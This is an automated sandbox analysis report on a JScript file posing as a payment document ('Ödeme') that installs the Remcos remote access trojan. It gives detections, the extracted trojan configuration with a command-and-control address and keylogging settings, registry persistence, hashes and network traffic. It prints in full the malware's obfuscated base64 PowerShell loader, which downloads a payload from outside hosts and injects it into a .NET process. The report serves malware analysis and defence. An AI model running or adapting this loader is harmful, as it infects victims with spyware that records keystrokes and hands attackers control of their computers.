File name:

Ödeme000986753363656472754723.js

Full analysis: https://app.any.run/tasks/ae2e0e7b-1b70-474c-8544-836aca98de88
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Analysis date: May 19, 2025, 07:57:56
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
rat
remcos
remote
susp-powershell
api-base64
Indicators:
MIME: text/plain
File info: Unicode text, UTF-8 text, with very long lines (37318), with no line terminators
MD5:

A137C2728F2D12AFB8D9F09D3FB75BCE

SHA1:

10DC0B2174E58900986971B10520A30C7994FBD9

SHA256:

22974A6D7748C8401D76DF5D299E5DB3F0EE4A8DFEFC4444E85A7726DFC094B1

SSDEEP:

96:U5s/BpZKBpnpsuBpZFBpMpsLBp9BpBprpsNBpZrBpkfspBp9uBprBpsHBpZKjBpK:4CsvAlyI0MDUpGx6ARyzI

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Sends HTTP request (SCRIPT)

      • wscript.exe (PID: 6620)
    • Creates internet connection object (SCRIPT)

      • wscript.exe (PID: 6620)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6264)
    • Opens an HTTP connection (SCRIPT)

      • wscript.exe (PID: 6620)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 6264)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 6264)
    • REMCOS has been detected

      • AddInProcess32.exe (PID: 664)
      • AddInProcess32.exe (PID: 664)
    • REMCOS mutex has been found

      • AddInProcess32.exe (PID: 664)
    • REMCOS has been detected (YARA)

      • AddInProcess32.exe (PID: 664)
    • REMCOS has been detected (SURICATA)

      • AddInProcess32.exe (PID: 664)
  • SUSPICIOUS

    • Executes script without checking the security policy

      • powershell.exe (PID: 6264)
    • Possibly malicious use of IEX has been detected

      • wscript.exe (PID: 6620)
    • Probably obfuscated PowerShell command line is found

      • wscript.exe (PID: 6620)
    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 6620)
    • The process bypasses the loading of PowerShell profile settings

      • wscript.exe (PID: 6620)
    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 6620)
    • Base64-obfuscated command line is found

      • wscript.exe (PID: 6620)
    • Potential Corporate Privacy Violation

      • wscript.exe (PID: 6620)
      • powershell.exe (PID: 6264)
    • Uses base64 encoding (POWERSHELL)

      • powershell.exe (PID: 6264)
    • Starts CMD.EXE for commands execution

      • powershell.exe (PID: 6264)
    • Likely accesses (executes) a file from the Public directory

      • cmd.exe (PID: 4180)
    • Reads security settings of Internet Explorer

      • AddInProcess32.exe (PID: 664)
    • Connects to unusual port

      • AddInProcess32.exe (PID: 664)
    • There is functionality for taking screenshot (YARA)

      • AddInProcess32.exe (PID: 664)
    • Contacting a server suspected of hosting an CnC

      • AddInProcess32.exe (PID: 664)
  • INFO

    • Checks proxy server information

      • wscript.exe (PID: 6620)
      • powershell.exe (PID: 6264)
      • AddInProcess32.exe (PID: 664)
    • Converts byte array into Unicode string (POWERSHELL)

      • powershell.exe (PID: 6264)
    • Disables trace logs

      • powershell.exe (PID: 6264)
    • Uses string replace method (POWERSHELL)

      • powershell.exe (PID: 6264)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6264)
    • Potential remote process memory reading (Base64 Encoded 'ReadProcessMemory')

      • powershell.exe (PID: 6264)
    • Potential modification of remote process state (Base64 Encoded 'SetThreadContext')

      • powershell.exe (PID: 6264)
    • Potential library load (Base64 Encoded 'LoadLibrary')

      • powershell.exe (PID: 6264)
    • Found Base64 encoded reflection usage via PowerShell (YARA)

      • powershell.exe (PID: 6264)
    • Found Base64 encoded text manipulation via PowerShell (YARA)

      • powershell.exe (PID: 6264)
    • Reads the computer name

      • AddInProcess32.exe (PID: 664)
    • Potential remote process memory writing (Base64 Encoded 'WriteProcessMemory')

      • powershell.exe (PID: 6264)
    • Potential remote process memory interaction (Base64 Encoded 'VirtualAllocEx')

      • powershell.exe (PID: 6264)
    • Potential access to remote process (Base64 Encoded 'OpenProcess')

      • powershell.exe (PID: 6264)
    • Checks supported languages

      • AddInProcess32.exe (PID: 664)
    • Creates files or folders in the user directory

      • AddInProcess32.exe (PID: 664)
    • Creates files in the program directory

      • AddInProcess32.exe (PID: 664)
    • Reads the software policy settings

      • slui.exe (PID: 1188)
    • Reads the machine GUID from the registry

      • AddInProcess32.exe (PID: 664)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Remcos

(PID) Process(664) AddInProcess32.exe
C2 (1)209.54.102.170:5070
BotnetMONDAY AGAIN 2
Options
Connect_interval1
Install_flagFalse
Install_HKCU\RunTrue
Install_HKLM\RunTrue
Install_HKLM\Explorer\Run1
Setup_path%LOCALAPPDATA%
Copy_fileremcos.exe
Startup_valueRemcos
Hide_fileFalse
Mutex_nameRmc-81L26C
Keylog_flag1
Keylog_path%LOCALAPPDATA%
Keylog_filelogs.dat
Keylog_cryptFalse
Hide_keylogFalse
Screenshot_flagFalse
Screenshot_time5
Take_ScreenshotFalse
Screenshot_path%APPDATA%
Screenshot_fileScreenshots
Screenshot_cryptFalse
Mouse_optionFalse
Delete_fileFalse
Audio_record_time5
Audio_path%ProgramFiles%
Audio_dirMicRecords
Connect_delay0
Copy_dirRemcos
Keylog_dirremcos
Max_keylog_file100000
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
138
Monitored processes
9
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe powershell.exe conhost.exe no specs sppextcomobj.exe no specs slui.exe cmd.exe no specs conhost.exe no specs #REMCOS addinprocess32.exe slui.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
664"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
AddInProcess.exe
Version:
4.8.9037.0 built by: NET481REL1
Modules
Images
c:\windows\microsoft.net\framework\v4.0.30319\addinprocess32.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\user32.dll
c:\windows\syswow64\win32u.dll
Remcos
(PID) Process(664) AddInProcess32.exe
C2 (1)209.54.102.170:5070
BotnetMONDAY AGAIN 2
Options
Connect_interval1
Install_flagFalse
Install_HKCU\RunTrue
Install_HKLM\RunTrue
Install_HKLM\Explorer\Run1
Setup_path%LOCALAPPDATA%
Copy_fileremcos.exe
Startup_valueRemcos
Hide_fileFalse
Mutex_nameRmc-81L26C
Keylog_flag1
Keylog_path%LOCALAPPDATA%
Keylog_filelogs.dat
Keylog_cryptFalse
Hide_keylogFalse
Screenshot_flagFalse
Screenshot_time5
Take_ScreenshotFalse
Screenshot_path%APPDATA%
Screenshot_fileScreenshots
Screenshot_cryptFalse
Mouse_optionFalse
Delete_fileFalse
Audio_record_time5
Audio_path%ProgramFiles%
Audio_dirMicRecords
Connect_delay0
Copy_dirRemcos
Keylog_dirremcos
Max_keylog_file100000
1188"C:\WINDOWS\System32\SLUI.exe" RuleId=3482d82e-ca2c-4e1f-8864-da0267b484b2;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEventC:\Windows\System32\slui.exe
SppExtComObj.Exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
4180"C:\Windows\System32\cmd.exe" /C copy *.js "C:\Users\Public\Downloads\diodangium.js"C:\Windows\System32\cmd.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
4244C:\WINDOWS\system32\SppExtComObj.exe -EmbeddingC:\Windows\System32\SppExtComObj.Exesvchost.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
KMS Connection Broker
Version:
10.0.19041.3996 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\sppextcomobj.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\oleaut32.dll
5072\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5352C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exesvchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
6184\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6264"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -w hidden -c "$bunchflower = 'JABwAGEAcgB0AGkAYgB1AHMAIAA9ACAAJwAwAC8AcQBSAEIATgBUAGgAMAA5AC8AZAAvAGUAZQAuAGUAIwBzAGEAcAAvAC8AOgBzAHAAIwAjAGgAJwA7ACQAYwBhAHIAZABpAG8AdgBlAHIAdAAgAD0AIAAkAHAAYQByAHQAaQBiAHUAcwAgAC0AcgBlAHAAbABhAGMAZQAgACcAIwAnACwAIAAnAHQAJwA7ACQAYQByAHIAYQBzACAAPQAgACcAaAB0AHQAcABzADoALwAvAGEAcgBjAGgAaQB2AGUALgBvAHIAZwAvAGQAbwB3AG4AbABvAGEAZAAvAG4AZQB3AF8AaQBtAGEAZwBlAF8AMgAwADIANQAwADUAMQA2AC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwAnADsAJABjAHkAYgBlAHIAdABlAHIAcgBvAHIAaQBzAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAYwB5AGIAZQByAHQAZQByAHIAbwByAGkAcwB0AC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAJwBVAHMAZQByAC0AQQBnAGUAbgB0ACcALAAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAnACkAOwAkAG4AeQBtAHAAaABpAGMAIAA9ACAAJABjAHkAYgBlAHIAdABlAHIAcgBvAHIAaQBzAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAYQByAHIAYQBzACkAOwAkAHoAZQBhAGwAbwB0AGkAcwBtACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAbgB5AG0AcABoAGkAYwApADsAJABuAHUAbgBzAGgAaQBwAHMAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBTAFQAQQBSAFQAPgA+ACcAOwAkAG4AbwBuAG4AdQB0AHIAaQB0AGkAbwB1AHMAIAA9ACAAJwA8ADwAQgBBAFMARQA2ADQAXwBFAE4ARAA+AD4AJwA7ACQAYwB5AGIAZQByAGkAZABlAG4AdABpAHQAeQAgAD0AIAAkAHoAZQBhAGwAbwB0AGkAcwBtAC4ASQBuAGQAZQB4AE8AZgAoACQAbgB1AG4AcwBoAGkAcABzACkAOwAkAGkAbgBkAHUAYwBpAGIAbABlACAAPQAgACQAegBlAGEAbABvAHQAaQBzAG0ALgBJAG4AZABlAHgATwBmACgAJABuAG8AbgBuAHUAdAByAGkAdABpAG8AdQBzACkAOwAkAGMAeQBiAGUAcgBpAGQAZQBuAHQAaQB0AHkAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABpAG4AZAB1AGMAaQBiAGwAZQAgAC0AZwB0ACAAJABjAHkAYgBlAHIAaQBkAGUAbgB0AGkAdAB5ADsAJABjAHkAYgBlAHIAaQBkAGUAbgB0AGkAdAB5ACAAKwA9ACAAJABuAHUAbgBzAGgAaQBwAHMALgBMAGUAbgBnAHQAaAA7ACQAZABvAHcAbgB0AHIAbwBkAGQAZQBuACAAPQAgACQAaQBuAGQAdQBjAGkAYgBsAGUAIAAtACAAJABjAHkAYgBlAHIAaQBkAGUAbgB0AGkAdAB5ADsAJABwAG8AbAB5AHAAaABlAG4AaQBzAG0AIAA9ACAAJAB6AGUAYQBsAG8AdABpAHMAbQAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABjAHkAYgBlAHIAaQBkAGUAbgB0AGkAdAB5ACwAIAAkAGQAbwB3AG4AdAByAG8AZABkAGUAbgApADsAJABoAGUAdABlAHIAbwBiAGkAbwBwAGgAbwByAGkAZAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABwAG8AbAB5AHAAaABlAG4AaQBzAG0AKQA7ACQAZwBvAHYAZQByAG4AYQBpAGwAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAaABlAHQAZQByAG8AYgBpAG8AcABoAG8AcgBpAGQAKQA7ACQAcgBvAHUAbgBkAGYAaQBzAGgAIAA9ACAAWwBkAG4AbABpAGIALgBJAE8ALgBIAG8AbQBlAF0ALgBHAGUAdABNAGUAdABoAG8AZAAoACcAVgBBAEkAJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJABjAGEAcgBkAGkAbwB2AGUAcgB0ACwAJwAxACcALAAnAEMAOgBcAFUAcwBlAHIAcwBcAFAAdQBiAGwAaQBjAFwARABvAHcAbgBsAG8AYQBkAHMAJwAsACcAZABpAG8AZABhAG4AZwBpAHUAbQAnACwAJwBBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAzADIAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAJwAsACcAagBzACcALAAnACcALAAnACcALAAnACcALAAnADIAJwAsACcAJwApACkA' -replace '','';$historiasters = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($bunchflower));Invoke-Expression $historiasters;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
6620"C:\Windows\System32\WScript.exe" C:\Users\admin\AppData\Local\Temp\Ödeme000986753363656472754723.jsC:\Windows\System32\wscript.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
7 586
Read events
7 579
Write events
7
Delete events
0

Modification events

(PID) Process:(6620) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
Operation:writeName:JScriptSetScriptStateStarted
Value:
2AC7100000000000
(PID) Process:(6264) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Operation:writeName:Path
Value:
C:\Users\Public\Downloads\diodangium.js
(PID) Process:(664) AddInProcess32.exeKey:HKEY_CURRENT_USER\SOFTWARE\Rmc-81L26C
Operation:writeName:exepath
Value:
90B73432A27D9740A5E8F4A9D9219B2A4BD887262CD3E1386559AC123ACAF6446BC8FAA656E467E2614340CD18E5E85D74AE9E9EA5DCA1564ED3F21FA396050CBA0AA7309F82C7D48CD3D262EC178CA1574FC20C312C8CECB9922C373C3129DBD677A7A897B2D51C3348703C374CE168A605145C9AA912ACB0A09CA6CC40BD2C2312
(PID) Process:(664) AddInProcess32.exeKey:HKEY_CURRENT_USER\SOFTWARE\Rmc-81L26C
Operation:writeName:licence
Value:
768689E3F9233E77A2F1AD2C3ECFDEFC
(PID) Process:(664) AddInProcess32.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation:writeName:CachePrefix
Value:
(PID) Process:(664) AddInProcess32.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation:writeName:CachePrefix
Value:
Cookie:
(PID) Process:(664) AddInProcess32.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation:writeName:CachePrefix
Value:
Visited:
Executable files
0
Suspicious files
3
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
6264powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_xk0ilblx.xnw.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4180cmd.exeC:\Users\Public\Downloads\diodangium.jstext
MD5:4F433CCDF747A21535D3DF76A6F91DBA
SHA256:18230C5DB44E4160E124EB9E392975A65ECBB12CE4408EFBDD6AAC18F221F8CB
6264powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_oembwvqn.y4a.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6264powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:890478CA3E61B07DF44FD005769116D0
SHA256:CF44C9A7D52AA5D73E970573FCD5F712002C760DC5002B6FC8B37349833D8AAB
664AddInProcess32.exeC:\ProgramData\remcos\logs.datbinary
MD5:D540B9824D0028D2DCE985596A10A469
SHA256:E213B2AA46561E21DFD58F576CBDB43BE9EEFABB21FDD64226FF332DE3CF9E78
664AddInProcess32.exeC:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\json[1].jsonbinary
MD5:0FE457BC692A1F2C57798BF8A7C21DA7
SHA256:0A595E4B678BECAB201EF7C44966E95C7F6CA15A4AC1A31B4A0D0D170AD31F49
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
7
TCP/UDP connections
27
DNS requests
19
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
95.101.149.131:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
GET
200
2.16.164.49:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.23.77.188:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6620
wscript.exe
GET
301
23.186.113.60:80
http://paste.ee/d/OZeYbgN8/0
unknown
shared
2384
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
664
AddInProcess32.exe
GET
200
178.237.33.50:80
http://geoplugin.net/json.gp
unknown
whitelisted
2384
SIHClient.exe
GET
200
23.35.229.160:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
2.16.164.49:80
crl.microsoft.com
Akamai International B.V.
NL
whitelisted
95.101.149.131:80
www.microsoft.com
Akamai International B.V.
NL
whitelisted
4
System
192.168.100.255:138
whitelisted
6620
wscript.exe
23.186.113.60:80
paste.ee
shared
6620
wscript.exe
23.186.113.60:443
paste.ee
shared
3216
svchost.exe
172.211.123.250:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
20.190.160.65:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6544
svchost.exe
2.23.77.188:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
  • 20.73.194.208
whitelisted
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.120
whitelisted
www.microsoft.com
  • 95.101.149.131
  • 23.35.229.160
whitelisted
google.com
  • 142.250.185.206
whitelisted
paste.ee
  • 23.186.113.60
shared
client.wns.windows.com
  • 172.211.123.250
whitelisted
login.live.com
  • 20.190.160.65
  • 40.126.32.74
  • 20.190.160.3
  • 40.126.32.72
  • 20.190.160.128
  • 40.126.32.134
  • 20.190.160.64
  • 20.190.160.2
whitelisted
ocsp.digicert.com
  • 2.23.77.188
whitelisted
archive.org
  • 207.241.224.2
whitelisted
dn721509.ca.archive.org
  • 204.62.247.7
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Misc activity
ET INFO Pastebin-like Service Domain in DNS Lookup (paste .ee)
6620
wscript.exe
Potential Corporate Privacy Violation
ET INFO Pastebin-style Service (paste .ee) in TLS SNI
6264
powershell.exe
Potential Corporate Privacy Violation
ET INFO Pastebin-style Service (paste .ee) in TLS SNI
664
AddInProcess32.exe
A Network Trojan was detected
REMOTE [ANY.RUN] REMCOS TLS Connection JA3 Hash
664
AddInProcess32.exe
Malware Command and Control Activity Detected
ET JA3 Hash - Remcos 3.x/4.x TLS Connection
No debug info